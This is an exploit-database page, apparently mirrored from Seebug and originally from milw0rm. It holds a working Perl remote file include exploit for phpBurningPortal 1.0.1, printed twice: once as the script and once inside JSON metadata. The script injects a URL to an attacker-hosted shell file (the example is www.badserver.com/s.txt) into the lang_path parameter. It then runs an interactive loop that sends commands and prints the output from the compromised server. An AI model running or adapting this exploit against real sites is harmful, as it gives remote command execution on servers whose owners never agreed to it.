Search...

phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit

2014-07-01T00:00:00

ID SSV:64118
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl

use LWP::UserAgent;
use LWP::Simple;

$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$fileno = @ARGV[3];

if(!$target || !$shellsite)
{
    usage();
}

header();

if ($fileno eq 1)
{
    $file = &#34;quest_delete.php?lang_path=&#34;;
}
elsif ($fileno eq 2)
{
    $file = &#34;quest_edit.php?lang_path=&#34;;
}
elsif ($fileno eq 3)
{
    $file = &#34;quest_news.php?lang_path=&#34;;
}
else
{
    $file = &#34;quest_delete.php?lang_path=&#34;;
}

print &#34;[cmd]\$&#34;;
$cmd = &#60;STDIN&#62;;

while ($cmd !~ &#34;exit&#34;)
{
    $xpl = LWP::UserAgent-&#62;new() or die;
        $req =
HTTP::Request-&#62;new(GET=&#62;$target&#39;/modules/includes/&#39;.$file.$shellsite.&#39;?&&#39;.$shellcmd.&#39;=&#39;.$cmd)
or die(&#34;\n\n Failed to connect.&#34;);
        $res = $xpl-&#62;request($req);
        $r = $res-&#62;content;
        $r =~ tr/[\n]/[&#234;]/;

    if (@ARGV[4] eq &#34;-r&#34;)
    {
        print $r;
    }

    print &#34;[cmd]\$&#34;;
    $cmd = &#60;STDIN&#62;;
}

sub header()
{
    print q
    {
########################################################################
    phpBurningPortal quiz-modul-1.0.1 - Remote File Include Exploit
               Vulnerability discovered and exploit by r0ut3r
                       writ3r@gmail.com
            For portal administrator testing purposes only!
########################################################################
    };
}

sub usage()
{
header();
    print q
    {
########################################################################
Usage:
perl q_xpl.pl &#60;Target website&#62; &#60;Shell Location&#62; &#60;CMD Variable&#62; &#60;No&#62; &#60;r&#62;
&#60;Target Website&#62; - Path to target eg: www.qvuln.target.com
&#60;Shell Location&#62; - Path to shell eg: www.badserver.com/s.txt
&#60;CMD Variable&#62; - Shell command variable name eg: cmd
&#60;No&#62; - File number, corresponding to:
1: quest_delete.php
2: quest_edit.php
3: quest_news.php
&#60;r&#62; - Show output from shell
Example:
perl a.pl http://localhost http://localhost/s.txt cmd 1 -r
########################################################################
    };
exit();
}

# milw0rm.com [2006-10-15]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-64118", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64118", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\n\r\nuse LWP::UserAgent;\r\nuse LWP::Simple;\r\n\r\n$target = @ARGV[0];\r\n$shellsite = @ARGV[1];\r\n$shellcmd = @ARGV[2];\r\n$fileno = @ARGV[3];\r\n\r\nif(!$target || !$shellsite)\r\n{\r\n usage();\r\n}\r\n\r\nheader();\r\n\r\nif ($fileno eq 1)\r\n{\r\n $file = "quest_delete.php?lang_path=";\r\n}\r\nelsif ($fileno eq 2)\r\n{\r\n $file = "quest_edit.php?lang_path=";\r\n}\r\nelsif ($fileno eq 3)\r\n{\r\n $file = "quest_news.php?lang_path=";\r\n}\r\nelse\r\n{\r\n $file = "quest_delete.php?lang_path=";\r\n}\r\n\r\nprint "[cmd]\\$";\r\n$cmd = <STDIN>;\r\n\r\nwhile ($cmd !~ "exit")\r\n{\r\n $xpl = LWP::UserAgent->new() or die;\r\n $req =\r\nHTTP::Request->new(GET=>$target'/modules/includes/'.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)\r\nor die("\\n\\n Failed to connect.");\r\n $res = $xpl->request($req);\r\n $r = $res->content;\r\n $r =~ tr/[\\n]/[ê]/;\r\n\r\n if (@ARGV[4] eq "-r")\r\n {\r\n print $r;\r\n }\r\n\r\n print "[cmd]\\$";\r\n $cmd = <STDIN>;\r\n}\r\n\r\nsub header()\r\n{\r\n print q\r\n {\r\n########################################################################\r\n phpBurningPortal quiz-modul-1.0.1 - Remote File Include Exploit\r\n Vulnerability discovered and exploit by r0ut3r\r\n writ3r@gmail.com\r\n For portal administrator testing purposes only!\r\n########################################################################\r\n };\r\n}\r\n\r\nsub usage()\r\n{\r\nheader();\r\n print q\r\n {\r\n########################################################################\r\nUsage:\r\nperl q_xpl.pl <Target website> <Shell Location> <CMD Variable> <No> <r>\r\n<Target Website> - Path to target eg: www.qvuln.target.com\r\n<Shell Location> - Path to shell eg: www.badserver.com/s.txt\r\n<CMD Variable> - Shell command variable name eg: cmd\r\n<No> - File number, corresponding to:\r\n1: quest_delete.php\r\n2: quest_edit.php\r\n3: quest_news.php\r\n<r> - Show output from shell\r\nExample:\r\nperl a.pl http://localhost http://localhost/s.txt cmd 1 -r\r\n########################################################################\r\n };\r\nexit();\r\n}\r\n\r\n# milw0rm.com [2006-10-15]\r\n\n ", "id": "SSV:64118", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:16:50", "reporter": "Root", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645568899}}

phpBurningPortal &lt;= 1.0.1 (lang_path) Remote File Include Exploit

Description

No description provided by source.

phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit